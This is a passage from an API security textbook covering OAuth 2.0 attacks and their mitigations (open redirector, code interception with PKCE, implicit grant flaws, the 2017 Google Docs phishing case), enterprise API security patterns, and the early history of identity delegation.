intercept the communication channel between the victim’s browser and the authorization server—or the victim’s browser and the resource server (see Figure 14-3). Once the request hits the authorization server and after the authentication, the user will be redirected to the provided redirect_uri, which also carries the open redirector query parameter pointing to the attacker’s endpoint. To detect any modifications to the redirect_uri, the authorization server can carry out a check against a preregistered URL. But then again, some authorization server implementations will only worry about the domain part of the URL and will ignore doing an exact one-to-one match. So, any changes to the query parameters will be unnoticed. Chapter 14 Oauth 2.0 SeCurity 299 Once the user got redirected to the open redirector endpoint, it will again redirect the user to the value (URL) defined in the open redirector query parameter—which will take him/her to the attacker’s endpoint. In this request to the attacker’s endpoint, the HTTP Referer header could carry some confidential data, including the authorization code (which is sent to the client application by the authorization server as a query parameter). How to prevent an open redirector attack: • Enforce strict validations at the authorization server against the redirect_uri. It can be an exact one-to-one match or regex match. • Validate the redirecting URL at open redirector and make sure you only redirect to the domains you own. Figure 14-3. Open Redirector attack Chapter 14 Oauth 2.0 SeCurity 300 • Use JWT Secured Authorization Request (JAR) or Pushed Authorization Requests (PAR) as discussed in Chapter 4 to protect the integrity of the authorization request, so the attacker won’t be able to modify the request to include the open redirector query parameter to the redirect_uri. Code Interception Attack Code interception attack could possibly happen in a native mobile app. OAuth 2.0 authorization requests from native apps should only be made through external user agents, primarily the user’s browser. The OAuth 2.0 for Native Apps specification (which we discussed in Chapter 10) explains in detail the security and usability reasons why this is the case and how native apps and authorization servers can implement this best practice. The way you do single sign-on in a mobile environment is by spinning up the system browser from your app and then initiate OAuth 2.0 flow from there. Once the authorization code is returned back to the redirect_uri (from the authorization server) on the browser, there should be a way to pass it over to the native app. This is taken care by the mobile OS—and each app has to register for a URL scheme with the mobile OS. When the request comes to that particular URL, the mobile OS will pass its control to the corresponding native app. But, the danger here is, there can be multiple apps that get registered for the same URL scheme, and there is a chance a malicious app could get hold of the authorization code. Since many mobile apps embed the same client id and client secret for all the instances of that particular app, the attacker can also find out what they are. By knowing the client id and client secret, and then having access to the authorization code, the malicious app can now get an access token on behalf of the end user. PKCE (Proof Key for Code Exchange), which we discussed in detail in Chapter 10, was introduced to mitigate such attacks. Let’s see how it works: 1. The OAuth 2.0 client app generates a random number (code_ verifier) and finds the SHA256 hash of it—which is called the code_challenge. 2. The OAuth 2.0 client app sends the code_challenge along with the hashing method in the authorization grant request to the authorization server. Chapter 14 Oauth 2.0 SeCurity 301 3. Authorization server records the code_challenge (against the issued authorization code) and replies back with the code. 4. The client sends the code_verifier along with the authorization code to the token endpoint. 5. The authorization server finds the hash of the provided code_ verifier and matches it against the stored code_challenge. If it does not match, rejects the request. With this approach, a malicious app just having access to the authorization code cannot exchange it to an access token without knowing the value of the code_verifier. Security Flaws in Implicit Grant Type The OAuth 2.0 implicit grant type (see Figure 14-4) is now obsolete. This was mostly used by single-page applications and native mobile apps—but no more. In both the cases, the recommendation is to use the authorization code grant type. There are few security flaws, as listed in the following, identified in the implicit grant type, and the IETF OAuth working group officially announced that the applications should not use implicit grant type any more: • With implicit grant type, the access token comes as a URI fragment and remains in the web browser location bar (step 5 in Figure 14-4). Since anything the web browser has in the location bar persevered as browser history, anyone having access to the browser history can steal the tokens. • Since the access token remains in the web browser location bar, the API calls initiated from the corresponding web page will carry the entire URL in the location bar, along with the access token, in the HTTP Referer header. This will let external API endpoints to figure out (looking at the HTTP Referer header) what the access token is and possibly misuse it. Chapter 14 Oauth 2.0 SeCurity 302 Google Docs Phishing Attack An attacker used a fake OAuth 2.0 app called Google Docs as a medium to launch a massive phishing attack targeting Google users in May 2017. The first target was the media companies and public relations (PR) agencies. They do have a large amount of contacts—and the attacker used the email addresses from their contact lists to spread the attack. It went viral for an hour—before the app was removed by Google. Is this a flaw in the OAuth 2.0 protocol exploited by the attacker or a flaw in how Google implemented it? Is there something we could have done better to prevent such attacks? Figure 14-4. OAuth 2.0 implicit grant flow. Chapter 14 Oauth 2.0 SeCurity 303 Almost all the applications you see on the Web today use the authorization code grant flow in OAuth 2.0. The attacker exploited step 3 in Figure 14-5 by tricking the user with an application name (Google Docs) known to them. Also, the attacker used an email template which is close to what Google uses in sharing docs, to make the user click on the link. Anyone who carefully looked at the email or even the consent screen could have caught up something fishy happening—but unfortunately, very few do care. It’s neither a flaw of OAuth 2.0 nor how Google implemented it. Phishing is a prominent threat in cybersecurity. Does that mean there is no way to prevent such attacks other than proper user education? There are basic things Google could do to prevent such attacks in the future. Looking at the consent screen, “Google Docs” is the key phrase used there to win user’s trust. When creating an OAuth 2.0 app in Google, you can pick any name you want. This helps an attacker to misguide users. Google could easily filter out the known names and prevent app developers from picking names to trick the users. Another key issue is Google does not show the domain name of the application (but just the application name) on the consent page. Having domain name prominently displayed on the consent page will provide some hint to the user where he is heading to. Also the image of the application on the consent page misleads the user. The attacker Figure 14-5. OAuth 2.0 authorization grant flow. Chapter 14 Oauth 2.0 SeCurity 304 has intentionally picked the Google Drive image there. If all these OAuth applications can go through an approval process, before launching into public, such mishaps can be prevented. Facebook already follows such a process. When you create a Facebook app, first, only the owner of the application can log in—to launch it to the public, it has to go through an approval process. G Suite is widely used in the enterprise. Google can give the domain admins more control to whitelist, which applications the domain users can access from corporate credentials. This prevents users under phishing attacks, unknowingly sharing access to important company docs with third-party apps. The phishing attack on Google is a good wake-up call to evaluate and think about how phishing resistance techniques can be occupied in different OAuth flows. For example, Google Chrome security team has put so much effort when they designed the Chrome warning page for invalid certificates. They did tons of research even to pick the color, the alignment of text, and what images to be displayed. Surely, Google will bring up more bright ideas to the table to fight against phishing. Summary • OAuth 2.0 is the de facto standard for access delegation to cater real production use cases. There is a huge ecosystem building around it— with a massive adoption rate. • Whenever you use OAuth, you should make sure that you follow and adhere to security best practices—and always use proven libraries and products, which already take care of enforcing the best practices. • OAuth 2.0 Threat Model and Security Considerations (RFC 6819) produced by OAuth IETF working group defines additional security considerations for OAuth 2.0, beyond those in the OAuth 2.0 specification, based on a comprehensive threat model. • The OAuth 2.0 Security Best Current Practice document, which is a draft proposal at the time of writing, talks about new threats related to OAuth 2.0, since the RFC 6819 was published. • The Financial-grade API (FAPI) working group under OpenID Foundation has published a set of guidelines on how to use OAuth 2.0 in a secure way to build financial-grade applications. Chapter 14 Oauth 2.0 SeCurity 305 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_15 CHAPTER 15 Patterns and Practices Throughout the book so far over 14 chapters and 7 appendices, we discussed different ways of securing APIs and the theoretical background behind those. In this chapter, we present a set of API security patterns to address some of the most common enterprise security problems. Direct Authentication with the Trusted Subsystem Suppose a medium-scale enterprise has a number of APIs. Company employees are allowed to access these APIs via a web application while they’re behind the company firewall. All user data are stored in Microsoft Active Directory (AD), and the web application is connected directly to the Active Directory to authenticate users. The web application passes the logged-in user’s identifier to the back-end APIs to retrieve data related to the user. The problem is straightforward, and Figure 15-1 illustrates the solution. You need to use some kind of direct authentication pattern. User authentication happens at the front- end web application, and once the user is authenticated, the web application needs to access the back-end APIs. The catch here is that the web application passes the logged-in user’s identifier to the APIs. That implies the web application needs to invoke APIs in a user-aware manner. Since both the web application and the APIs are in the same trust domain, we only authenticate the end user at the web application, and the back-end APIs trust whatever data passed on to those from the web application. This is called the trusted subsystem pattern. The web application acts as a trusted subsystem. In such case, the best way to secure APIs is through mutual Transport Layer Security (mTLS). All the requests generated from the web application are secured with mTLS, and no one but the web application can access the APIs (see Chapter 3). 306 Some do resist using TLS due to the overhead it adds and rely on building a controlled environment, where security between the web application and the container that hosts APIs is governed at the network level. Network-level security must provide the assurance that no component other than the web application server can talk to the container that hosts the APIs. This is called the trust-the-network pattern, and over the time, this has become an antipattern. The opposite of the trust-the-network pattern is zero-trust network. With the zero-trust network pattern, we do not trust the network. When we do not trust the network, we need to make sure we have enforced security checks as much as closer to the resource (or in our case, the APIs). The use of mTLS to secure the APIs is the most ideal solution here. Single Sign-On with the Delegated Access Control Suppose a medium-scale enterprise has a number of APIs. Company employees are allowed to access these APIs via web applications while they’re behind the company firewall. All user data are stored in Microsoft Active Directory, and all the web applications are connected to an identity provider, which supports Security Assertion Markup Language (SAML) 2.0 to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user. Figure 15-1. Direct authentication with the trusted subsystem pattern Chapter 15 patterns and praCtiCes 307 The catch here is the last statement: “The web applications need to access back-end APIs on behalf of the logged-in user.” This suggests the need for an access delegation protocol: OAuth 2.0. However, users don’t present their credentials directly to the web application—they authenticate through a SAML 2.0 identity provider. In this case, you need to find a way to exchange the SAML token a web application receives via the SAML 2.0 Web SSO protocol for an OAuth access token, which is defined in the SAML grant type for the OAuth 2.0 specification (see Chapter 12). Once the web application receives the SAML token, as shown in step 3 of Figure 15-2, it has to exchange the SAML token to an access token by talking to the OAuth 2.0 authorization server. Figure 15-2. Single sign-on with the Delegated Access Control pattern The authorization server must trust the SAML 2.0 identity provider. Once the web application gets the access token, it can use it to access back-end APIs. The SAML grant type for OAuth 2.0 doesn’t provide a refresh token. The lifetime of the access token issued by the OAuth 2.0 authorization server must match the lifetime of the SAML token used in the authorization grant. After the user logs in to the web application with a valid SAML token, the web application creates a session for the user from then onward, and it doesn’t worry about the lifetime of the SAML token. This can lead to some issues. Say, for example, the SAML token expires, but the user still has a valid browser session in the web application. Because the SAML token has expired, you can expect that the corresponding OAuth Chapter 15 patterns and praCtiCes 308 2.0 access token obtained at the time of user login has expired as well. Now, if the web application tries to access a back-end API, the request will be rejected because the access token is expired. In such a scenario, the web application has to redirect the user back to the SAML 2.0 identity provider, get a new SAML token, and exchange that token for a new access token. If the session at the SAML 2.0 identity provider is still live, then this redirection can be made transparent to the end user. Single Sign-On with the Integrated Windows Authentication Suppose a medium-scale enterprise that has a number of APIs. Company employees are allowed to access these APIs via multiple web applications while they’re behind the company firewall. All user data are stored in Microsoft Active Directory, and all the web applications are connected to a SAML 2.0 identity provider to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user. All the users are in a Windows domain, and once they’re logged in to their workstations, they shouldn’t be asked to provide credentials at any point for any other application. The catch here is the statement, “All the users are in a Windows domain, and once they’re logged in to their workstations, they shouldn’t be asked to provide credentials at any point for any other application.” You need to extend the solution we provided using single sign-on (SSO) with the Delegated Access Control pattern (the second pattern). In that case, the user logs in to the SAML 2.0 identity provider with their Active Directory username and password. Here, this isn’t acceptable. Instead, you can use Integrated Windows Authentication (IWA) to secure the SAML 2.0 identity provider. When you configure the SAML 2.0 identity provider to use IWA, then once the user is redirected to the identity provider for authentication, the user is automatically authenticated; as in the case of SSO with the Delegated Access Control pattern, a SAML response is passed to the web application. The rest of the flow remains unchanged. Chapter 15 patterns and praCtiCes 309 Identity Proxy with the Delegated Access Control Suppose a medium-scale enterprise has a number of APIs. Company employees, as well as employees from trusted partners, are allowed to access these APIs via web applications. All the internal user data are stored in Microsoft Active Directory, and all the web applications are connected to a SAML 2.0 identity provider to authenticate users. The web applications need to access back-end APIs on behalf of logged-in users. Figure 15-3. Identity proxy with the Delegated Access Control pattern This use case is an extension of using SSO with the Delegated Access Control pattern. The catch here is the statement, “company employees, as well as employees from trusted partners, are allowed to access these APIs via web applications.” You now have to go beyond the company domain. Everything in Figure 15-2 remains unchanged. The only thing you need to do is to change the authentication mechanism at the SAML 2.0 identity provider (see Figure 15-3). Regardless of the end user’s domain, the client web application only trusts the identity provider in its own domain. Internal as well as external users are first redirected to the internal (or local) SAML identity provider. The local identity provider should offer the user the option to pick whether to authenticate with their username and password Chapter 15 patterns and praCtiCes 310 (for internal users) or to pick their corresponding domain. Then the identity provider can redirect the user to the corresponding identity provider running in the external user’s home domain. Now the external identity provider returns a SAML response to the internal identity provider. The external identity provider signs this SAML token. If the signature is valid, and if it’s from a trusted external identity provider, the internal identity provider issues a new SAML token signed by itself to the calling application. The flow then continues as shown in Figure 15-2. Note One benefit of this approach is that the internal applications only need to trust their own identity provider. the identity provider handles the brokering of trust between other identity providers outside its domain. in this scenario, the external identity provider also talks saML, but that can’t be expected all the time. there are also identity providers that support other protocols. in such scenarios, the internal identity provider must be able to transform identity assertions between different protocols. Delegated Access Control with the JSON Web Token Suppose a medium-scale enterprise that has a number of APIs. Company employees are allowed to access these APIs via web applications while they’re behind the company firewall. All user data are stored in Microsoft Active Directory, and all the web applications are connected to an OpenID Connect identity provider to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user. This use case is also an extension of the SSO with the Delegated Access Control pattern. The catch here is the statement, “all the web applications are connected to an OpenID Connect identity provider to authenticate users.” You need to replace the SAML identity provider shown in Figure 15-2 with an OpenID Connect identity provider, as illustrated in Figure 15-4. This also suggests the need for an access delegation protocol (OAuth). In this case, however, users don’t present their credentials directly to the web application; rather, they authenticate through an OpenID Connect identity provider. Thus, you need to find a way to exchange the ID token received in OpenID Connect authentication for an OAuth access token, which is defined in the JWT grant type for Chapter 15 patterns and praCtiCes 311 OAuth 2.0 specification (Chapter 12). Once the web application receives the ID token in step 3, which is also a JWT, it has to exchange it for an access token by talking to the OAuth 2.0 authorization server. The authorization server must trust the OpenID Connect identity provider. When the web application gets the access token, it can use it to access back-end APIs. Figure 15-4. Delegated Access Control with the JWT pattern Note Why would someone exchange the id token obtained in Openid Connect for an access token when it directly gets an access token along with the id token? this is not required when both the Openid Connect server and the Oauth authorization server are the same. if they aren’t, you have to use the JWt Bearer grant type for Oauth 2.0 and exchange the id token for an access token. the access token issuer must trust the Openid Connect identity provider. Nonrepudiation with the JSON Web Signature Suppose a medium-scale enterprise in the finance industry needs to expose an API to its customers through a mobile application, as illustrated in Figure 15-5. One major requirement is that all the API calls should support nonrepudiation. Chapter 15 patterns and praCtiCes 312 The catch here is the statement, “all the API calls should support nonrepudiation.” When you do a business transaction via an API by proving your identity, you shouldn’t be able to reject it later or repudiate it. The property that ensures the inability to repudiate is known as nonrepudiation. Basically, you do it once, and you own it forever (see Chapter 2 for details). Nonrepudiation should provide proof of the origin and the integrity of data in an unforgeable manner, which a third party can verify at any time. Once a transaction is initiated, none of its content, including the user identity, date, time, and transaction details, should be altered while in transit, in order to maintain transaction integrity and to allow for future verifications. Nonrepudiation has to ensure that the transaction is unaltered and logged after it’s committed and confirmed. Logs must be archived and properly secured to prevent unauthorized modifications. Whenever there is a repudiation dispute, transaction logs, along with other logs or data, can be retrieved to verify the initiator, date, time, transaction history, and so on. The way to achieve nonrepudiation is via signature. A key known only to the end user should sign each message. In this case, the financial institution must issue a key pair to each of its customers, signed by a certificate authority under its control. It should only store the corresponding public certificate, not the private key. The customer can install the private key in his or her mobile device and make it available to the mobile application. All API calls generated from the mobile application must be signed by the private key of the user and encrypted by the public key of the financial institution. To sign the message, the mobile application can use JSON Web Signature (see Chapter 7); and for encryption, it can use JSON Web Encryption (see Chapter 8). When using both the signature and encryption on the same payload, the message must be signed first, and then the signed payload must be encrypted for legal acceptance. Figure 15-5. Nonrepudiation with the JSON Web Signature pattern Chapter 15 patterns and praCtiCes 313 Chained Access Delegation Suppose a medium-scale enterprise that sells bottled water has an API (Water API) that can be used to update the amount of water consumed by a registered user. Any registered user can access the API via any client application. It could be an Android app, an iOS app, or even a web application. The company only provides the API—anyone can develop client applications to consume it. All the user data of the Water API are stored in Microsoft Active Directory. The client applications shouldn’t be able to access the API directly to find out information about users. Only the registered users of the Water API can access it. These users should only be able to see their own information. At the same time, for each update made by a user, the Water API must update the user’s healthcare record maintained at MyHealth.org. The user also has a personal record at MyHealth.org, and it too exposes an API (MyHealth API). The Water API has to invoke the MyHealth API to update the user record on the user’s behalf. In summary, a mobile application accesses the Water API on behalf of the end user, and then the Water API has to access the MyHealth API on behalf of the end user. The Water API and the MyHealth API are in two independent domains. This suggests the need for an access delegation protocol. Figure 15-6. Chained Access Delegation pattern Chapter 15 patterns and praCtiCes 314 Again, the catch here is the statement, “the Water API must also update the user’s healthcare record maintained at MyHealth.org.” This has two solutions. In the first solution, the end user must get an access token from MyHealth.org for the Water API (the Water API acts as the OAuth client), and then the Water API must store the token internally against the user’s name. Whenever the user sends an update through a mobile application to the Water API, the Water API first updates its own record and then finds the MyHealth access token corresponding to the end user and uses it to access the MyHealth API. With this approach, the Water API has the overhead of storing the MyHealth API access token, and it should refresh the access token whenever needed. The second solution is explained in Figure 15-6. It’s built around the OAuth 2.0 Token Delegation profile (see Chapter 9). The mobile application must carry a valid access token to access the Water API on behalf of the end user. In step 3, the Water API talks to its own authorization server to validate the access token. Then, in step 4, the Water API exchanges the access token it got from the mobile application for a JWT access token. The JWT access token is a special access token that carries some meaningful data, and the authorization server in the Water API’s domain signs it. The JWT includes the end user’s local identifier (corresponding to the Water API) as well as its mapped identifier in the MyHealth domain. The end user must permit this action at the Water API domain. In step 6, the Water API accesses the MyHealth API using the JWT access token. The MyHealth API validates the JWT access token by talking to its own authorization server. It verifies the signature; and, if it’s signed by a trusted entity, the access token is treated as valid. Because the JWT includes the mapped username from the MyHealth domain, it can identify the corresponding local user record. However, this raises a security concern. If you let users update their profiles in the Water API domain with the mapped MyHealth identifier, they can map it to any user identifier, and this leads to a security hole. To avoid this, the account mapping step must be secured with OpenID Connect authentication. When the user wants to add his or her MyHealth account identifier, the Water API domain initiates the OpenID Connect authentication flow and receives the corresponding ID token. Then the account mapping is done with the user identifier in the ID token. Chapter 15 patterns and praCtiCes 315 Trusted Master Access Delegation Suppose a large-scale enterprise that has a number of APIs. The APIs are hosted in different departments, and each department runs its own OAuth 2.0 authorization server due to vendor incompatibilities in different deployments. Company employees are allowed to access these APIs via web applications while they’re behind the company firewall, regardless of the department which they belong to. Figure 15-7. Trusted Master Access Delegation pattern All user data are stored in a centralized Active Directory, and all the web applications are connected to a centralized OAuth 2.0 authorization server (which also supports OpenID Connect) to authenticate users. The web applications need to access back- end APIs on behalf of the logged-in user. These APIs may come from different departments, each of which has its own authorization server. The company also has a centralized OAuth 2.0 authorization server, and an employee having an access token from the centralized authorization server must be able to access any API hosted in any department. Chapter 15 patterns and praCtiCes 316 Once again, this is an extended version of using SSO with the Delegated Access Control pattern. You have a master OAuth 2.0 authorization server and a set of secondary authorization servers. An access token issued from the master authorization server should be good enough to access any of the APIs under the control of the secondary authorization servers. In other words, the access token returned to the web application, as shown in step 3 of Figure 15-7, should be good enough to access any of the APIs. To make this possible, you need to make the access token self-contained. Ideally, you should make the access token a JWT with the iss (issuer) field. In step 4, the web application accesses the API using the access token; and in step 5, the API talks to its own authorization server to validate the token. The authorization server can look at the JWT header and find out whether it issued this token or if a different server issued it. If the master authorization server issued it, then the secondary authorization server can talk to the master authorization server’s OAuth introspection endpoint to find out more about the token. The introspection response specifies whether the token is active and identifies the scopes associated with the access token. Using the introspection response, the secondary authorization server can build an eXtensible Access Control Markup Language (XACML) request and call a XACML policy decision point (PDP). If the XACML response is evaluated to permit, then the web application can access the API. Then again XACML is a little too complex in defining access control policies, irrespective of how powerful it is. You can also check the Open Policy Agent (OPA) project, which has become quite popular recently in building fine-grained access control policies. Resource Security Token Service (STS) with the Delegated Access Control Suppose a global organization has APIs and API clients are distributed across different regions. Each region operates independently from the others. Currently, both clients and APIs are nonsecured. You need to secure the APIs without making any changes either at the API or the client end. The solution is based on a simple theory in software engineering: introducing a layer of indirection can solve any problem. You need to introduce two interceptors. One sits in the client region, and all the nonsecured messages generated from the client are intercepted. The other interceptor sits in the API region, and all the API requests are intercepted. No other component except this interceptor can access the APIs in a nonsecured manner. Chapter 15 patterns and praCtiCes 317 This restriction can be enforced at the network level. Any request generated from outside has no path to the API other than through the API interceptor. Probably you deploy both API interceptor and the API in the same physical machine. You can also call this component a policy enforcement point (PEP) or API gateway. The PEP validates the security of all incoming API requests. The interceptor’s responsibility, sitting in the client region, is to add the necessary security parameters to the nonsecured messages generated from the client and to send it to the API. In this way, you can secure the API without making changes at either the client or the API end. Still, you have a challenge. How do you secure the API at the API gateway? This is a cross-domain scenario, and the obvious choice is to use JWT grant type for OAuth 2.0. Figure 15-8 explains how the solution is implemented. Nonsecured requests from the client application are captured by the interceptor component in step 1. Then it has to talk to its own security token service (STS). In step 2, the interceptor uses a default user account to access the STS using OAuth 2.0 client credentials grant type. The STS authenticates the request and issues a self-contained access token (a JWT), having the STS in the API region as the audience of the token. In step 3, the client-side interceptor authenticates to the STS at the API region with the JWT token and gets a new JWT token, following OAuth 2.0 Token Delegation profile, which we discussed in Chapter 9. The audience of the new JWT is the OAuth 2.0 Figure 15-8. Resource STS with the Delegated Access Control pattern Chapter 15 patterns and praCtiCes 318 authorization server running in the API region. Before issuing the new JWT, the STS at the API region must validate its signature and check whether a trusted entity has signed it. To make this scenario happen, the STS in the API region must trust the STS on the client side. The OAuth 2.0 authorization server only trusts its own STS. That is why step 4 is required. Step 4 initiates the JWT grant type for OAuth 2.0, and the client interceptor exchanges the JWT issued by the STS of the API region for an access token. Then it uses that access token to access the API in step 5. The PEP in the API region intercepts the request and calls the authorization server to validate the access token. If the token is valid, the PEP lets the request hit the API (step 7). Delegated Access Control with No Credentials over the Wire Suppose a company wants to expose an API to its employees. However, user credentials must never go over the wire. This is a straightforward problem with an equally straightforward solution. Both OAuth 2.0 bearer tokens and HTTP Basic authentication take user credentials over the wire. Even though both these approaches use TLS for protection, still some companies worry about passing user credentials over communication channels—or in other words passing bearer tokens over the wire. You have few options: use either HTTP Digest authentication or OAuth 2.0 MAC tokens (Appendix G). Using OAuth 2.0 MAC tokens is the better approach because the access token is generated for each API, and the user can also revoke the token if needed without changing the password. However, the OAuth 2.0 MAC token profile is not matured yet. The other approach is to use OAuth 2.0 with Token Binding, which we discussed in Chapter 11. Even though we use bearer tokens there, with Token Binding, we bind the token to the underneath TLS channel—so no one can export the token and use it somewhere else. There are few more draft proposals discussed under the IETF OAuth working group to address this concern. The OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens is one of them, available at https://tools.ietf.org/ html/draft-ietf-oauth-mtls-17. Chapter 15 patterns and praCtiCes 319 Summary • API security is an ever-evolving subject. • More and more standards and specifications are popping up, and most of them are built around the core OAuth 2.0 specification. • Security around JSON is another evolving area, and the IETF JOSE working group is currently working on it. • It’s highly recommended that if you wish to continue beyond this book, you should keep an eye on the IETF OAuth working group, the IETF JOSE working group, the OpenID Foundation, and the Kantara Initiative. Chapter 15 patterns and praCtiCes 321 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_16 APPENDIX A The Evolution of Identity Delegation Identity delegation plays a key role in securing APIs. Most of the resources on the Web today are exposed over APIs. The Facebook API exposes your Facebook wall, the Twitter API exposes your Twitter feed, Flickr API exposes your Flickr photos, Google Calendar API exposes your Google Calendar, and so on. You could be the owner of a certain resource (Facebook wall, Twitter feed, etc.) but not the direct consumer of an API. There may be a third party who wants to access an API on your behalf. For example, a Facebook app may want to import your Flickr photos on behalf of you. Sharing credentials with a third party who wants to access a resource you own on your behalf is an antipattern. Most web-based applications and APIs developed prior to 2006 utilized credential sharing to facilitate identity delegation. Post 2006, many vendors started developing their own proprietary ways to address this concern without credential sharing. Yahoo! BBAuth, Google AuthSub, and Flickr Authentication are some of the implementations that became popular. A typical identity delegation model has three main roles: delegator, delegate, and service provider. The delegator owns the resource and is also known as the resource owner. The delegate wants to access a service on behalf of the delegator. The delegator delegates a limited set of privileges to the delegate to access the service. The service provider hosts the protected service and validates the legitimacy of the delegate. The service provider is also known as the resource server. 322 Direct Delegation vs. Brokered Delegation Let’s take a step back and look at a real-world example (see Figure A-1). Flickr is a popular cloud-based service for storing and sharing photos. Photos stored in Flickr are the resources, and Flickr is the resource server or the service provider. Say you have a Flickr account: you’re the resource owner (or the delegator) of the photos under your account. You also have a Snapfish account. Snapfish is a web-based photo-sharing and photo-printing service that is owned by Hewlett-Packard. How can you print your Flickr photos from Snapfish? To do so, Snapfish has to first import those photos from Flickr and should have the privilege to do so, which should be delegated to Snapfish by you. You’re the delegator, and Snapfish is the delegate. Other than the privilege to import photos, Snapfish won’t be able to do any of the following with your Flickr photos: • Access your Flickr account (including private content) • Upload, edit, and replace photos and videos in the account • Interact with other members’ photos and videos (comment, add notes, favorite) Figure A-1. Direct delegation. The resource owner delegates privileges to the client application Snapfish can now access your Flickr account on your behalf with the delegated privileges. This model is called direct delegation: the delegator directly delegates a subset of his or her privileges to a delegate. The other model is called indirect delegation: the delegator first delegates to an intermediate delegate, and that delegate delegates to another delegate. This is also known as brokered delegation (see Figure A-2). Appendix A The evoluTion of idenTiTy delegATion 323 Let’s say you have a Lucidchart account. Lucidchart is a cloud-based design tool that you can use to draw a wide variety of diagrams. It also integrates with Google Drive. From your Lucidchart account, you have the option to publish completed diagrams to your Google Drive. To do that, Lucidchart needs privileges to access the Google Drive API on your behalf, and you need to delegate the relevant permissions to Lucidchart. If you want to print something from Lucidchart, it invokes the Snapfish printing API. Snapfish needs to access the diagrams stored in your Google Drive. Lucidchart has to delegate a subset of the permissions you delegated to it to Snapfish. Even though you granted read/write permissions to Lucidchart, it only has to delegate read permission to Snapfish to access your Google Drive and print the selected drawings. The Evolution The modern history of identity delegation can be divided into two eras: pre-2006 and post-2006. Credential sharing mostly drove identity delegation prior to 2006. Twitter, SlideShare, and almost all the web applications used credential sharing to access third- party APIs. As shown in Figure A-3, when you created a Twitter account prior to 2006, Twitter asked for your email account credentials so it could access your email address book and invite your friends to join Twitter. Interestingly, it displayed the message “We don’t store your login, your password is submitted securely, and we don’t email without your permission” to win user confidence. But who knows—if Twitter wanted to read all your emails or do whatever it wanted to your email account, it could have done so quite easily. Figure A-2. Brokered delegation. The resource owner delegates privileges to an intermediate application and that application delegates privileges to another application Appendix A The evoluTion of idenTiTy delegATion 324 SlideShare did the same thing. SlideShare is a cloud-based service for hosting and sharing slides. Prior to 2006, if you wanted to publish a slide deck from SlideShare to a Blogger blog, you had to give your Blogger username and password to SlideShare, as shown in Figure A-4. SlideShare used Blogger credentials to access its API to post the selected slide deck to your blog. If SlideShare had wanted to, it could have modified published blog posts, removed them, and so on. Figure A-3. Twitter, pre-2006 Figure A-4. SlideShare, pre-2006 Appendix A The evoluTion of idenTiTy delegATion 325 These are just two examples. The pre-2006 era was full of such applications. Google Calendar, introduced in April 2006, followed a similar approach. Any third-party application that wanted to create an event in your Google Calendar first had to request your Google credentials and use them to access the Google Calendar API. This wasn’t tolerable in the Internet community, and Google was pushed to invent a new and, of course, better way of securing its APIs. Google AuthSub was introduced toward the end of 2006 as a result. This was the start of the post-2006 era of identity delegation. Google ClientLogin In the very early stages of its deployment, the Google Data API was secured with two nonstandard security protocols: ClientLogin and AuthSub. ClientLogin was intended to be used by installed applications. An installed application can vary from a simple desktop application to a mobile application—but it can’t be a web application. For web applications, the recommended way was to use AuthSub. Note The complete google Clientlogin documentation is available at https:// developers.google.com/accounts/docs/AuthForInstalledApps. The Clientlogin Api was deprecated as of April 20, 2012. According to the google deprecation policy, it operated the same until April 20, 2015. As shown in Figure A-5, Google ClientLogin uses identity delegation with password sharing. The user has to share his Google credentials with the installed application in the first step. Then the installed application creates a request token out of the credentials, and it calls the Google Accounts Authorization service. After the validation, a CAPTCHA challenge is sent back as the response. The user must respond to the CAPTCHA and is validated again against the Google Accounts Authorization service. Once the user is validated successfully, a token is issued to the application. Then the application can use the token to access Google services. Appendix A The evoluTion of idenTiTy delegATion 326 Google AuthSub Google AuthSub was the recommended authentication protocol to access Google APIs via web applications in the post-2006 era. Unlike ClientLogin, AuthSub doesn’t require credential sharing. Users don’t need to provide credentials for a third-party web application—instead, they provide credentials directly to Google, and Google shares a temporary token with a limited set of privileges with the third-party web application. The third-party application uses the temporary token to access Google APIs. Figure A-6 explains the protocol flow in detail. Figure A-5. Google ClientLogin Figure A-6. Google AuthSub Appendix A The evoluTion of idenTiTy delegATion 327 The end user initiates the protocol flow by visiting the web application. The web application redirects the user to the Google Accounts Authorization service with an AuthSub request. Google notifies the user of the access rights (or the privileges) requested by the application, and the user can approve the request by login. Once approved by the user, Google Accounts Authorization service provides a temporary token to the web application. Now the web application can use that temporary token to access Google APIs. Note The complete google AuthSub documentation is available at https:// developers.google.com/accounts/docs/AuthSub. how to use AuthSub with the google data Api is explained at https://developers.google.com/ gdata/docs/auth/authsub. The AuthSub Api was deprecated as of April 20, 2012. According to the google deprecation policy, it operated the same until April 20, 2015. Flickr Authentication API Flickr is a popular image/video hosting service owned by Yahoo!. Flickr was launched in 2004 (before the acquisition by Yahoo! in 2005), and toward 2005 it exposed its services via a public API. It was one of the very few companies at that time that had a public API; this was even before the Google Calendar API. Flickr was one of the very few applications that followed an identity delegation model without credential sharing prior to 2006. Most of the implementations that came after that were highly influenced by the Flickr Authentication API. Unlike in Google AuthSub or ClientLogin, the Flickr model was signature based. Each request should be signed by the application from its application secret. Yahoo! Browser–Based Authentication (BBAuth) Yahoo! BBAuth was launched in September 2006 as a generic way of granting third-party applications access to Yahoo! data with a limited set of privileges. Yahoo! Photos and Yahoo! Mail were the first two services to support BBAuth. BBAuth, like Google AuthSub, borrowed the same concept used in Flickr (see Figure A-7). Appendix A The evoluTion of idenTiTy delegATion 328 The user first initiates the flow by visiting the third-party web application. The web application redirects the user to Yahoo!, where the user has to log in and approve the access request from the third-party application. Once approved by the user, Yahoo! redirects the user to the web application with a temporary token. Now the third-party web application can use the temporary token to access user’s data in Yahoo! with limited privileges. Note The complete guide to yahoo! BBAuth is available at http://developer. yahoo.com/bbauth/. OAuth Google AuthSub, Yahoo! BBAuth, and Flickr Authentication all made considerable contributions to initiate a dialog to build a common standardized delegation model. OAuth 1.0 was the first step toward identity delegation standardization. The roots of OAuth go back to November 2006, when Blaine Cook started developing an OpenID implementation for Twitter. In parallel, Larry Halff of Magnolia (a social bookmarking site) was thinking about integrating an authorization model with OpenID (around this time, OpenID began gaining more traction in the Web 2.0 community). Larry started discussing the use of OpenID for Magnolia with Twitter and found out there is no way to delegate access to Twitter APIs through 